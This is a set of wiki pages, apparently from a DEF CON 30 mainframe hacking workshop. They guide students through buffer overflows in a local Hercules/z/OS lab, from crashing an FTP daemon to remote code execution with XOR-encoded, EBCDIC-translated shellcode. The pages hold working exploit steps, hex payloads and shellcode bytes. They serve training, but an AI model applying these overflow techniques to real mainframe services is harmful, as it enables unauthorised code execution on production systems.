Setting up your environment 12 | 13 | In you're workshop VM (if you're using it) we've provided a shell script to make your lives easier: `~/docker.sh` 14 | 15 | Running this does the following: 16 | 17 | * resets the defcon30 container 18 | * Opens up the ports 2323 (tn3270) , 8443 (web, 8888 locally 19 | * Opens ports 2121 through 2141 20 | * Maps the volume `/printers` to `~/dumps` 21 | 22 | Here's how to use those ports/folders: 23 | 24 | * TN3270: `x3270 -noverifycert L:localhost:2323` or pw3270 25 | * Web based 3270: https://localhost:8443 (the secret is `D3FC0N`) 26 | * Hercules Console: http://localhost:8888 (Username/password: `defcon`) 27 | * Lab Wiki: http://localhost:8080 28 | * ftp: `ftp localhost 2121` ⬅️ a range of ports from 2121 to 2141 is available 29 | * `/home/defcon/dumps`: Read the output of `/home/defcon/dumps/prt00e.txt` when you crash FTPD 30 | 31 | If you're not using the VM you can do the same with these docker commands: 32 | 33 | ``` 34 | docker kill defcon30 35 | docker rm defcon30 36 | docker run -d \ 37 | --name=defcon30 \ 38 | -e HUSER=defcon \ 39 | -e HPASS=defcon \ 40 | -p 2323:3223 \ 41 | -p 8888:8888 \ 42 | -p 2121-2141:2121-2141 \ 43 | -p 8443:8443 \ 44 | -p 8080:8080 \ 45 | -p 31337-31347:31337-31347 \ 46 | -v ~/dumps:/printers \ 47 | --restart unless-stopped \ 48 | mainframed767/defcon30:latest 49 | ``` 50 | 51 | 52 | !! Create ASCII de Brujin 53 | 54 | # Using FTP download both rexx scripts in `.EXEC`: 55 | #* `cd .exec` 56 | #* `get DEBRUIJN DEBRUIJN.rexx` 57 | #* `get DECODEI DECODEI.rexx` and exit FTP 58 | #* this is already done for you on the workshop vm in the folder `~/labs`. 59 | # In a linux terminal generate a de Brujin pattern with `rexx ~/labs/DEBRUIJN.rexx 1500` 60 | # Copy it to your copy/paste buffer: `rexx ~/labs/DEBRUIJN.rexx 1500 | xsel --clipboard --input` 61 | 62 | !! 
Overflow 63 | 64 | Before we get started make sure you've got the hercules console open at http://localhost:8888/ (user/pass: `defcon`) and click on ''System Log''. 65 | 66 | # In a linux terminal connect to the FTP server: `ncat -v localhost 2121` 67 | # Once connected type `USER ` 68 | # You will get no response cause you've crashed the FTP server 69 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C4 U0000` means we've crashed FTPD 70 | #* The console doesn't autoupdate, so you'll need to click on `Auto Refresh` to see these updates. Turn it off again when done. 71 | # You can exit ncat with ctrl-c 72 | 73 | !! Tracing the Dump (heh) 74 | 75 | # Make sure we can read the dump: `sudo chmod 655 ~/dumps/prt00e.txt` 76 | # Copy the dump to `~/dump.txt`: `cp ~/dumps/prt00e.txt ~/dump.txt` 77 | # Open the file in your editor of choice: `kate ~/dump.txt` 78 | # Search for `PSW AT ENTRY TO ABEND 078D0000 000CD948` and take note of the address `000CD948` 79 | #* we need this address but since the addresses start at 0 we'll search for `0CD940` 80 | # Search for `0CD940`. This should give you a line similar to `0CD940 41E02064 58C0D000 90CE2000 18D218CF 18B158A0 C08CD203 D058B000 5820D058` 81 | # 8 bytes in is this instruction: `90CE2000` 82 | # Use DECODEI to decode the instruction from machine code to readable in your linux terminal: `rexx ~/labs/DECODEI.rexx 90CE2000` 83 | #* The output from decoding is: `STM R12,R14,0(R2)` 84 | #* STM is store multiple: http://www.simotime.com/asmins01.htm#STM this means that the machine is using `R2` as the base register 85 | # Search the file for `REGS AT TIME OF ERROR` and notice that R2 is set to `C288F7C2`. 86 | #* We can use http://www.longpelaexpertise.com/toolsCode.php to figure out what that is in ASCII: `Bh7B` 87 | #* `C288F7C2` is way outside of addressable memory, we need to change that to be somewhere in memory our program can read/write. 
88 | #* Here's our challenge, we cant just use any hex, whatever we send to the FTP socket gets translated from ASCII to EBCDIC. So we have to find ASCII bytes that will translate to the EBCDIC bytes we need. 89 | #* Using http://www.simotime.com/asc2ebc1.htm we can find those bytes 90 | # Find a location in memory we can use 91 | #* Search `~/dump.txt` for `IBMUSER.CLIST` and take note of the memory address on the far left: [img[clistaddress.png]] 92 | #* The address we'll use is `12C000`: 93 | #** The `12` and the `C0` are easy but we can't have a `00` because that a NULL byte. So we replace that will 12. 94 | #** `C0` is `{` in EBCDIC, which is `7B` in ASCII 95 | # Now we need to create a buffer and replace `Bh7B` with `127B12` 96 | #* This, when sent to FTP, will be translated to `12C012` 97 | #* We need 4 bytes though, so we prepend `80` thus our final hex is `80127B12` 98 | #* Why `80`? 00 Is null so it wouldn't work, and we need something that translates. 99 | 100 | 101 | 102 | 103 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 11 - 2 Crash 2 Furious.tid: -------------------------------------------------------------------------------- 1 | created: 20220801234259555 2 | modified: 20220805170656775 3 | tags: 4 | title: Lab 11 - 2 Crash 2 Furious 5 | type: text/vnd.tiddlywiki 6 | 7 | 8 | !! Creating the New buffer 9 | 10 | # Run `printf 'user ' > pattern2; rexx ~/labs/DEBRUIJN.rexx 1500 >> pattern2` 11 | # Edit pattern2 with your editor of choice: 12 | #* e.g. `okteta pattern2` on the workshop vm 13 | # Search for (ctrl-f in okteta) our pattern: `Bh7B` 14 | # Replace these four bytes with `80127B12` 15 | # Save your changes 16 | 17 | [img[Screenshot_2022-08-03_16-17-06.png]] 18 | 19 | !! 
Restarting the FTPD server 20 | 21 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2122` 22 | #* This starts the FTP server on port 2122, since it crashed using port 2121 that port is not longer available 23 | # Submit your edited second buffer: `cat pattern2|ncat -v -w1 localhost 2122` 24 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C4 U0000` means we've crashed FTPD 25 | # Congrats you crashed it, again! 26 | 27 | !! Tracing this second Dump (heh) or Second step same as the first 28 | 29 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 30 | # Open the file in your editor of choice: `kate ~/dump.txt` 31 | #* ⚠️ This file contains the previous dump as well as the current one. ⚠️ 32 | # Search for `PSW AT ENTRY TO ABEND 078D1000 00095CCC` and take note of the address `00095CCC` 33 | #* we need this address but since the addresses start at 0 we'll search for `095CC0` 34 | # Search for `0CD940`. This should give you a line similar to `095CC0 14414780 F0380640 4440F04C 41242001` 35 | # `C` bytes in is this instruction: `41242001` 36 | # Use DECODEI to decode the instruction from machine code to readable in your linux terminal: `rexx ~/labs/DECODEI.rexx 41242001` 37 | #* The output from decoding is: `LA R2,1(R4,R2)` 38 | #* STM is store multiple: http://www.simotime.com/asmins01.htm#LA this means that the machine is going to load the address at (R2 + R4) in to R2 39 | # Search the file for `REGS AT TIME OF ERROR` and notice that R2 is set to `F3C287F4`. (` 3Bg4`) 40 | #* ''Note'' there's now two dumps in the dump log 41 | # As previously `F3C287F4` does not exist as a location in memory, we need another place we can jump to. 
42 | # Open pattern2 with your hex editor: `okteta pattern2` 43 | # replace the four bytes at 3Bg4 with: `80124142` 44 | #* This will get converted from ascii to ebcdic to `2012C1C2` 45 | # Save your changes as `pattern3` 46 | 47 | !! Restarting the FTPD server 48 | 49 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2123` 50 | # Submit your edited buffer: `cat pattern3|ncat -v -w1 localhost 2123` 51 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C1 U0000` 52 | # Congrats you crashed it, again, uh, again! 53 | 54 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 12 - Hackers Returns.tid: -------------------------------------------------------------------------------- 1 | created: 20220804053052613 2 | modified: 20220805172321148 3 | tags: 4 | title: Lab 12 - Hackers Returns 5 | type: text/vnd.tiddlywiki 6 | 7 | 8 | !! The machine code 9 | 10 | In the previous lab we caused a crash at memory location `00095CCC` lets look at the rest of the instructions from there: `1F144140 00FF4610 F03C9824 D01C07FE` 11 | 12 | ``` 13 | 1F144140 | SLR R1,R4 14 | 00FF | DC X'00FF' 15 | 4610F03C | BCT R1,60(,R15) 16 | 9824D01C | LM R2,R4,28(R13) 17 | 07FE | BCR B'1111',R14 18 | ``` 19 | !! Finding our Return 20 | 21 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 22 | # Open the file in your editor of choice: `kate ~/dump.txt` 23 | #* ⚠️ This file contains the previous dump as well as the current one. ⚠️ 24 | #* To find our current job we look for `STC 111 FTPDDC30` 25 | # Search the dump file for `REGS AT TIME OF ERROR` and notice that R13 is set to `F5C288F6`. (`5Bh6`) so we replace that with yet another location in memory. 
# Open pattern3 in your hex editor: `okteta pattern3`
You should see this line: 11 | 12 | ``` 13 | 134080 C185F2C1 85F3C185 F4C185F5 C185F6C1 85F7C185 F8C185F9 C185F0C1 86F1C186 *Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Ae0Af1Af* 14 | ``` 15 | !! How do we read/use this line: 16 | 17 | The line starts at memory location `134080`. But to use it we need it to be in ASCII first such that translating it to EBCDIC will give us what we want: 18 | 19 | * `13` --> `13` 20 | * `40` --> `20` 21 | * `80` --> `D8` 22 | 23 | To make life easier we've created a script to do this: 24 | 25 | ``` 26 | python3 ~/labs/e2alookup.py 13 40 80 27 | 13 --> 13 28 | 40 --> 20 29 | 80 --> D8 30 | Final String: 1320D8 31 | ``` 32 | 33 | !! Adding to our Overflow 34 | 35 | # Open pattern4 in you hex editor: `okteta pattern4` 36 | # Search for `8Ac9` and replace it with `801320D8` 37 | # Save this as pattern5 38 | 39 | !! Restarting the FTPD server 40 | 41 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2125` 42 | # Submit your edited second buffer: `cat pattern5|ncat -v -w1 localhost 2125` 43 | # Notice in the hercules console at http://localhost:8888/ the message `/ IEF450I FTPDDC30 FTPDDC30 - ABEND S0C1 U0000` means we've crashed FTPD 44 | # Congrats you crashed it, again! 45 | # We need to restart the FTP server one last time so on the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2126` 46 | 47 | !! We control Return 48 | 49 | # Copy the dump to `~/dump.txt` again: `cp ~/dumps/prt00e.txt ~/dump.txt` 50 | # Open the file in your editor of choice: `kate ~/dump.txt` 51 | #* ⚠️ This file contains the previous dump as well as the current one. 
⚠️ 52 | # Take a look at the crash dump, if you look at the PSW you'll see `PSW AT ENTRY TO ABEND 078D0000 00134086` 53 | #* `00134086` is the address where it crashed (6 bytes in from where we told it to jump, this means the jump worked) 54 | #* `SYSTEM = 0C1` means that an attempt has been made to execute an invalid op code. http://faculty.cs.niu.edu/~hutchins/csci640/abend.htm 55 | 56 | Now we just copy/paste our machine code from maybe `DEFCON.OVERFLOW(WTO400)` and we're good right?! LOL no this is mainframes, we've got a bit of work still. 57 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 14 - Sockets and EBCDIC.tid: -------------------------------------------------------------------------------- 1 | created: 20220804203418702 2 | modified: 20220805232038613 3 | tags: 4 | title: Lab 14 - Sockets and EBCDIC 5 | type: text/vnd.tiddlywiki 6 | 7 | Up till now we've had to manually look up the ASCII -> EBCDIC for our memory locations. Well, we'll have the exact same problem with our shell code. Here's the shell code: 8 | 9 | ``` 10 | USING *,R14 11 | DS XL6 12 | COPY LA R1,MSGWTO 13 | SVC 35 14 | SVC 03 15 | MSGWTO DC XL4'000C0000' 16 | DC C'RINGRING' 17 | ``` 18 | 19 | !! Creating the shell code 20 | 21 | # Logon on to the local mainframe (either `x3270 -noverifycert L:localhost:2323` or https://localhost:8443) 22 | # Logon with DC00: `LOGON DC00/DC00` 23 | # Using ISPF submit the job LAB13 from `DC00.JCLLIB`: 24 | #* `=3.4` option/command bar 25 | #* put `DC00.JCLLIB` in `Data set name prefix ==>` 26 | #* Put an `E` in front of `DC00.JCLLIB` 27 | #* Put an `E` in front of `LAB13` 28 | #* On the command bar type `SUBMIT` 29 | 30 | If you look at line 41 you can see that the output of the assembled/linked binary is in `DC00.LOAD(WTOSML)` 31 | 32 | [img[linewtosml.png]] 33 | 34 | !! 
Download the shell code 35 | 36 | Similar to the previous exploit we need to download the assembled binary from FTP 37 | 38 | # Restart the FTP server: on the Command line in http://localhost:8888 (Username/password: `defcon`) type `/start ftpddc30,srvport=2126` 39 | # FTP and donwload the output: 40 | ## `ftp localhost 2126` 41 | ## `cd DC00.LOAD` 42 | ## `bin` ⬅️ ''important'' 43 | ## `GET WTOSML` 44 | 45 | !! Get the Bytes 46 | 47 | # Open WTOSML with your hex editor, and copy the bytes between `CAFEBABE` (You can skip the leading null bytes `00`) 48 | #* Right click -> Copy as -> Value: `41 10 E0 0E 0A 23 0A 03 00 0C 00 00 D9 C9 D5 C7 D9 C9 D5 C7`. 49 | 50 | [img[newwtosml.png]] 51 | 52 | We now have the shell code we're going to use, except there are still Null bytes (`00`) and other bytes that won't convert cleanly 53 | 54 | !! XOR EBCDIC 55 | 56 | # What if we had some bytes that we XOR'd our shell code with? Well, lucky for you we wrote a python script `findbytes.py` to do that for you. 57 | #* Run `python3 ~/labs/findbytes.py 41 10 E0 0E 0A 23 0A 03 00 0C 00 00 D9 C9 D5 C7 D9 C9 D5 C7` which outputs: `Shellcode: D889799793BA939A9995999940504C5E40504C5E XOR Key : 9999999999999999999999999999999999999999` 58 | 59 | 60 | # Or using cyberchef, we XOR the bytes and get: `D889799793BA939A9995999940504C5E40504C5E` ([[Link to the recipe if you're interested|https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')XOR(%7B'option':'Hex','string':'9999999999999999999999999999999999999999'%7D,'Standard',false)To_Hex('None',0)To_Upper_case('All')&input=NDExMEUwMEUwQTIzMEEwMzAwMEMwMDAwRDlDOUQ1QzdEOUM5RDVDNw]]) 61 | # ''Problem'' We've XOR'd our shell code, but we need a way to un XOR it on the mainframe. Luckily Jake wrote the assembly to do just that. 
62 | # Open the file `DC00.JCLLIB(LAB14)` (just like we did above) 63 | # Replace `` with `D889799793BA939A9995999940504C5E40504C5E` 64 | # Replace `` with `9999999999999999999999999999999999999999` 65 | # On the command bar type `SUBMIT` to submit the job 66 | 67 | [img[exploitxor.png]] 68 | 69 | !! Download The Final Form 70 | 71 | Our shell code is ready and waiting in `DC00.LOAD(WTOSMLX)`. 72 | 73 | # Download the shell code with FTP (as described above, make sure you use ''binary'' download `bin`): `GET WTOSMLX` 74 | # Open this file with your hex editor `okteta WTOSMLX` 75 | # Notice our shell code is between `CAFEBABE`: `D7 14 E0 06 E0 1A D8 89 79 97 93 BA 93 9A 99 95 99 99 40 50 4C 5E 40 50 4C 5E 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99` [img[exploitshell.png]] 76 | #* This is what we need it to look like after it gets translated by from ASCII to EBCDIC by the socket, so we need to convert each byte to ASCII first. 77 | # Instead of doing it by hand, we have a included a python script in the workshop VM: `python3 ~/labs/e2alookup.py D7 14 E0 06 E0 1A D8 89 79 97 93 BA 93 9A 99 95 99 99 40 50 4C 5E 40 50 4C 5E 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99 99`: 78 | 79 | ``` 80 | D7 --> 50 81 | 14 --> 9D 82 | E0 --> 5C 83 | 06 --> 86 84 | E0 --> 5C 85 | 1A --> 92 86 | D8 --> 51 87 | 89 --> 69 88 | 79 --> 60 89 | 97 --> 70 90 | 93 --> 6C 91 | BA --> DD 92 | 93 --> 6C 93 | 9A --> AA 94 | 99 --> 72 95 | 95 --> 6E 96 | 99 --> 72 97 | 99 --> 72 98 | 40 --> 20 99 | 50 --> 26 100 | 4C --> 3C 101 | 5E --> 3B 102 | 40 --> 20 103 | 50 --> 26 104 | 4C --> 3C 105 | 5E --> 3B 106 | 99 --> 72 107 | 99 --> 72 108 | 99 --> 72 109 | 99 --> 72 110 | 99 --> 72 111 | 99 --> 72 112 | 99 --> 72 113 | 99 --> 72 114 | 99 --> 72 115 | 99 --> 72 116 | 99 --> 72 117 | 99 --> 72 118 | 99 --> 72 119 | 99 --> 72 120 | 99 --> 72 121 | 99 --> 72 122 | 99 --> 72 123 | 99 --> 72 124 | 99 --> 72 125 | 99 --> 72 126 | Final String: 
509D5C865C92516960706CDD6CAA726E727220263C3B20263C3B7272727272727272727272727272727272727272 127 | Writting bytes to shellcode.bin 128 | ``` 129 | 130 | Notice the last line, it also writes these bytes to `shellcode.bin`. 131 | 132 | 133 | 134 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 15 - RCE.tid: -------------------------------------------------------------------------------- 1 | created: 20220804223858219 2 | modified: 20220805232014850 3 | tags: 4 | title: Lab 15 - RCE 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Copying Bytes 8 | 9 | # The last lab created the file `shellcode.bin`, open that file with your hex editor: `okteta shellcode.bin` 10 | # Select all the bytes in the file, and copy them 11 | # Open the pattern file `pattern5` with your hex editor: `okteta pattern5` 12 | # In pattern5 search for `Ae2A` (offset `80`). Replace it (and the other bytes) with the bytes you copied from shellcode.bin 13 | # Save this file as `pattern6` 14 | 15 | It should look like this: 16 | 17 | [img[rceoverflow.png]] 18 | 19 | !! Exploit! 20 | 21 | Your FTP server is still be running on port 2126, we need to reset it. 22 | 23 | # On the Command line in http://localhost:8888 (Username/password: `defcon`) send `/stop ftpddc30` 24 | # Then `/start ftpddc30,srvport=2126` 25 | 26 | # Exploit: `cat pattern6 | ncat -v -w1 localhost 2126` 27 | 28 | If you look now at the output from the master console you can see our code executed (you may need to turn on the Auto Refresh) 29 | 30 | ``` 31 | / +FTP00GI Connection from 172.17.0.1 - 17.53.27 2022/08/05 32 | / +RINGRING 33 | / IEF404I FTPDDC30 - ENDED - TIME=17.53.27 34 | / $HASP395 FTPDDC30 ENDED 35 | ``` 36 | 37 | Or from the job log 38 | 39 | [img[joblog.png]] 40 | 41 | Congrats! You've done a mainframe RCE! You're part of a small handful of people in the world who could do this! 
42 | 43 | 44 | [img[youdidit.jpg]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 2 - First Overflow.tid: -------------------------------------------------------------------------------- 1 | created: 20220731183824487 2 | modified: 20220805065443779 3 | tags: 4 | title: Lab 2 - First Overflow 5 | type: text/vnd.tiddlywiki 6 | 7 | Lets take a look at the first buffer overflow 8 | 9 | # In ISPF edit the file `.OVERFLOW(LGBT400)` 10 | #* In the `Command ===>` line type `=3.4` 11 | #* Then fill in `Data set name prefix ==>` with your username [img[dataset user.png]] 12 | #* Tab or arrow key until your cursor is in front of `.OVERFLOW` and put `V` [img[putv.png]] 13 | #* then put a `V` again in front of `LGBT400` and hit enter 14 | # On the `Command ===>` line type `HEX ON` 15 | 16 | This enables the hex editor: 17 | [img[Screenshot_2022-07-31_11-40-25.png]] 18 | 19 | Each byte now has its hex value underneath, vertically. LGBT in EBCDIC is `D3 C7 C2 E3` 20 | 21 | Pressing `F11` to scroll to the right you'll notice this line is 400 columns wide. 22 | 23 | !! Overflowing the HELLO buffer 24 | 25 | # Edit `.JCLLIB(LAB02)` (Hit `F3` twice, then move your cursor to `.JCLLIB`, but `E` then put another `E` in front of `LAB02`. This is the last time i'm reminding you how to open a file. ) 26 | #* To turn off the hex editor type `HEX OFF` and hit enter. 27 | #* Notice that `SYSUDUMP` output is set to `DC00.DUMP001` 28 | #* Also notice our input `STDIN` is the other file we just looked at 29 | # After looking at the job, submit the job with `SUBMIT` in the command lin 30 | # This job will fail with `ABENDED SYSTEM 0C6` 31 | 32 | !! Reviewing the Dump (heh) 33 | 34 | # When a job fails is creates a dump, we can open that file. 
35 | # Open the output from the dump in `.DUMP001` (same as before, `F3` twice then `E` in front of the dataset) 36 | # Search for LGBT in hex with `F D3C7C2E3` on the command line (RG means register) 37 | # Jump to line 4546 `L 4546`, this is memory, see all the LGBT in hex. 38 | # Note down which memory address our `LGBT` starts at (this is the column after the line numbers, in hex) 39 | [img[lgtbmemory.png]] 40 | (hint its `0B40AC`) 41 | 42 | Image showing register being overwritten: 43 | [img[Screenshot_2022-07-31_11-50-09.png]] 44 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 3 - Find our return address.tid: -------------------------------------------------------------------------------- 1 | created: 20220731185039915 2 | modified: 20220805065719567 3 | tags: 4 | title: Lab 3 - Find our return address 5 | type: text/vnd.tiddlywiki 6 | 7 | Somewhere in the 400 bytes we overflows we overwrote the return address. Now we need to find it. 8 | 9 | # Edit `.OVERFLOW(LOC400)`, notice its alpha/numeric every 4 bytes. 10 | # Edit `.JCLLIB(LAB03)` and submit the job by typing `SUBMIT` in the command line. This job will fail with `ABENDED SYSTEM 0C4` 11 | # Edit the dump `.DUMP002`. Notice on line 3 we can see the PSW `0PSW AT ENTRY TO ABEND 078D0000 007C7C7C` which means the CPU tried to execute instruction at memory location `7C 7C 7C`. 12 | # Jump to line 384 `L 384` and notice the RETurn value was ` RET 7C7C7C7C`. `7C` in ebcdic is the character `@`. 13 | # ''We can now control the return address!!'' 14 | 15 | [img[Screenshot_2022-07-31_12-00-00.png]] 16 | 17 | Going back to `LOC400` we need to find where the character @ repeated 4 times? 
-------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 4 - Exploit!.tid: -------------------------------------------------------------------------------- 1 | created: 20220731185926293 2 | modified: 20220805065919404 3 | tags: 4 | title: Lab 4 - Exploit! 5 | type: text/vnd.tiddlywiki 6 | 7 | Now that we know where in our buffer we can control the return, we can now overflow the buffer and control execution. 8 | 9 | # Edit `.OVERFLOW(WTO400)` Scroll to the right with `F11` and see now that the `@@@@` have been replaced with something (around `Columns 257 328`). 10 | #* Turn on the hex editor with `HEX ON` so see what it is. 11 | #* This address should be similar to the memory location we noted down in Lab 2. 12 | #* ''Bonus question'': Why isn't it the same as the location that LGBT starts in memory from Lab 2? 13 | # Edit `.JCLLIB(LAB04)`. and submit the job. It should end with `MAX COND CODE 0000` 14 | # View the job output (type `=3.8` on the command bar and `ST ` to show only your jobs. 15 | #* Notice in the job log we see ` +H4CK3D TH3 M41NFR4M3`. This is a Write To Operator (WTO) message that we executed with our overflow! 16 | 17 | 18 | If you want to see what we changed, download both `.OVERFLOW(LOC400)` and `.OVERFLOW(WTO400)` with FTP in binary mode (FTP is listening on port 2121) and use the linux command `vbindiff` to compare them. Vbindiff can show EBCDIC by pressing `C` 19 | 20 | [img[Screenshot_2022-07-31_12-05-20.png]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 5 - OPENTST.tid: -------------------------------------------------------------------------------- 1 | created: 20220731215614196 2 | modified: 20220805070618632 3 | tags: 4 | title: Lab 5 - OPENTST 5 | type: text/vnd.tiddlywiki 6 | 7 | Open test is a simple ASM program assembled, linked and placed in `SYSC.LINKLIB(OPENTST)`. 
It has been placed in an APF-authorized dataset, but it cannot run authorized because its load module was link-edited with `AC=00`. APF authorization needs both conditions (library in the APF list and `AC=1` on the module), so a bug in OPENTST alone does not yet give us authorized code execution. 8 | 9 | [img[Screenshot_2022-07-31_14-59-18.png]] 10 | 11 | Here's the source from https://github.com/jake-mainframe/ARBAUTH/blob/master/arbauth.jcl 12 | 13 | ``` 14 | OPENTST CSECT 15 | *********************************************************************** 16 | * INITIALIZATION 17 | *********************************************************************** 18 | BALR R12,0 19 | USING *,R12 20 | STM R14,R12,SAVE 21 | OPEN (INDCB,(INPUT)) 22 | *********************************************************************** 23 | * MAINSTREAM OF PROGRAM 24 | *********************************************************************** 25 | GET INDCB,INAREA 26 | SAYHI LA R1,MSGHI 27 | SVC 35 28 | *********************************************************************** 29 | * END OF PROGRAM 30 | *********************************************************************** 31 | ENDPROG LM R14,R12,SAVE 32 | XR R15,R15 33 | BR R14 34 | *********************************************************************** 35 | * DATA 36 | *********************************************************************** 37 | MSGHI DC XL4'00570000' 38 | DC CL3'HI ' 39 | INAREA DS CL80 40 | SAVE DS 18F 41 | *********************************************************************** 42 | * DATASETS 43 | *********************************************************************** 44 | INDCB DCB DSORG=PS,MACRF=(GM),DDNAME=INPUTDD, X 45 | RECFM=FB,EODAD=SAYHI 46 | *********************************************************************** 47 | * MACROS 48 | *********************************************************************** 49 | YREGS 50 | END OPENTST CSECT 51 | ``` 52 | 53 | The overflow is caused because `INAREA` is only 80 bytes and `SAVE`, the 18-word register save area, sits immediately after it in storage. `GET INDCB,INAREA` is a move-mode read: QSAM copies one whole logical record into `INAREA`, and the DCB declares `RECFM=FB` without an `LRECL`, so the record length is taken from the input dataset (or its DD statement) rather than from the program. Hand it a dataset whose records are longer than 80 bytes and the copy runs straight over `SAVE`; at `ENDPROG` the `LM R14,R12,SAVE` then reloads R14 (the return address) and the other registers from our data, and `BR R14` branches wherever we said. The bug is the trust placed in the record length: a DCB that does not pin `LRECL` to the buffer size, in a program that never checks it, lets whoever supplies the input choose how many bytes land in a fixed 80-byte area. (Side note: the WTO length word `X'0057'` is 87 = 4 + 3 + 80, so the `HI ` message echoes the whole of `INAREA` after it.) 
54 | 55 | !! Run OPENTST 56 | 57 | By this point you should know how to edit and submit JCL. This lab only has one step: 58 | 59 | # Edit `.JCLLIB(LAB05)`, replacing the placeholder with your username (or really any text of your choice), and submit it. 60 | 61 | If you look at the joblog you can see `+HI NEO... ` 62 | [img[neowhiterabbit.png]] -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 6 - De Brujin.tid: -------------------------------------------------------------------------------- 1 | created: 20220731220224535 2 | modified: 20220805071314556 3 | tags: 4 | title: Lab 6 - De Brujin 5 | type: text/vnd.tiddlywiki 6 | 7 | Using REXX, generate a de Bruijn pattern: a sequence in which every 4-byte window is unique, so any 4 bytes we later find in a register map back to exactly one offset in our input. This REXX script is courtesy of Davide Girardi and available here: https://gist.github.com/davidegirardi/61385ae404f4306349167ac1483b40b9#file-brujin-rex 8 | 9 | # Exit ISPF (hit `F3` until you're at the READY prompt, or exit ISPF by putting `=x` on the command line) and run `RX DEBRUIJN 20`. This REXX script is stored in `.EXEC(DEBRUIJN)`. [img[debruijnrexx.png]] 10 | # Open up ISPF again and edit `.JCLLIB(LAB06)`. 11 | # Notice that all this JCL is doing is running the DEBRUIJN script and generating 1000 characters. 12 | # Submit this job to place those 1000 characters in `DC00.OVERFLOW.ARBAUTH(DEBRUIJN)` 13 | # The job should return with `MAX COND CODE 0000` 14 | 15 | [img[LAB6.png]] 16 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 7 - De Brujin Overflow.tid: -------------------------------------------------------------------------------- 1 | created: 20220731222605570 2 | modified: 20220805071536414 3 | tags: 4 | title: Lab 7 - De Brujin Overflow 5 | type: text/vnd.tiddlywiki 6 | 7 | OPENTST is vulnerable to a buffer overflow (we went over it in class). We have a file with 1,000 characters in a de Bruijn pattern, far more than the 80 bytes `INAREA` can hold. Instead of sending OPENTST our username, we send it that pattern. 
That's what the line `//INPUTDD DD DISP=SHR,DSN=DC00.OVERFLOW.ARBAUTH(DEBRUIJN)` in `.JCLLIB(LAB07)` is doing. 8 | 9 | # Open and SUBMIT `.JCLLIB(LAB07)` 10 | # Notice the output from it is `ABENDED SYSTEM 0C6` ''BONUS'' Who can tell me what S0C6 means? (Hint: look at the R14 value below and remember that instructions must start on an even address.) 11 | # Its dump will be placed in `.DUMP003`; edit that file 12 | # Search for `REGS AT TIME OF ERROR`: in ISPF `F "REGS AT TIME OF ERROR"` 13 | # Hit `F11` to scroll right, and notice that Register 14 (E) is set to `F8C183F9` (or similar). Because every 4-byte window of the pattern is unique, this value identifies exactly which 4 bytes of the file were restored into R14 by `LM R14,R12,SAVE`. 14 | 15 | 16 | ``` 17 | 18 | +3C REGS AT TIME OF ERROR 84F1C184 F2C184F3 C184F4C1 84F5C184 F6C184F7 C184F8C1 84F9C184 F0C185F1 (0-7) 19 | +5C C185F2C1 85F3C185 F4C185F5 C185F6C1 85F7C185 00094FB0 F8C183F9 00000000 (8-F) 20 | +7C EC PSW AT TIME OF ERROR 078D0000 00C183FB 00020006 009B5800 21 | 22 | ``` 23 | 24 | # Edit `.OVERFLOW.ARBAUTH(DEBRUIJN)` and turn the hex editor on with `HEX ON`. 25 | # Search for `F8C183F9`: `F x'F8C183F9'` 26 | # The editor will find `8Ac9` but will put the cursor at the end. To fix this press `F10` and place your cursor on the first 8 from the right hand side. Then press `F11`. It should look like this: 27 | [img[Screenshot_2022-07-31_17-01-06.png]] 28 | 29 | # Replace the hex `F8C183F9` with `DEADBEEF` or some other punny eye-catcher hex value, e.g. `ABADD00D`, and save your changes 30 | # Go back to `.JCLLIB(LAB07)` and resubmit it; you'll get the same error 31 | # Open `.DUMP003` and search for `DEADBEEF`. If R14 now holds your eye-catcher, you have confirmed which 4 bytes control the return address. 32 | 33 | !! Find where we are in memory 34 | 35 | # The first 4 chars of the de Bruijn pattern are `Aa1A` or `C1 81 F1 C1`. Open `.DUMP003` and search `F C181F1C1` then hit `F10` (the editor auto scrolled you to the right for the search). 
